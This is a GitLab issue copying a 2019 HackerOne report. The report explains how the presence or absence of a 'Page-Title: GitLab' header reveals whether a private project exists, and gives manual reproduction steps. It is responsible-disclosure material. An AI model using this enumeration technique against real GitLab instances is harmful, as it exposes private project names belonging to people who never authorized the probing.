ESCALATED: Disclosure of private project names based on Page-Title: GitLab header
HackerOne report #651893 by janmasarik on 2019-07-20, assigned to akelly:
Summary
You can enumerate private project names of anyone based on the presence of Page-Title: GitLab header in GET /username/project endpoint.
If a private group with a specified name exists, most of the API endpoints under /username/project path will respond without Page-Title: GitLab.
If a given project does not exist, the response will include the Page-Title: GitLab header. Based on my previous report #338537 (closed), I believe that this is not intended behavior and if you specify the project as private, its name shouldn't leak to unauthenticated users.
Steps to reproduce
- Create a private project on GitLab, e.g. [REDACTED]
- Authenticate with any other user in GitLab, let's say
user2. - With the session of
user2that is not authorized to view[REDACTED]t, send an authenticated GET request to/jan.masarik1/secret. - Notice the missing
Page-Title: GitLab=> project exists
Verification
- With the session of
user2, send GET request to/jan.masarik1/non-existent. - See the
Page-Title: GitLabheader => project does not exist
Examples
(If the bug is project related, please create an example project and export it using the project export feature)
(If you are using an older version of GitLab, this will also help determine whether the bug has been fixed in a more recent version)
(If the bug can be reproduced on GitLab.com without violating the Rules of Engagement as outlined in the program policy, please provide the full path to the project.)
What is the current bug behavior?
Private project name is disclosed.
What is the expected correct behavior?
Private project name should remain secret. :-)
Relevant logs and/or screenshots
[REDACTED]
Output of checks
This bug happens on GitLab.com
Impact
Similar as in #338537 (closed) or #642420 (Low)
Attachments
Warning: Attachments received through HackerOne, please exercise caution! [REDACTED]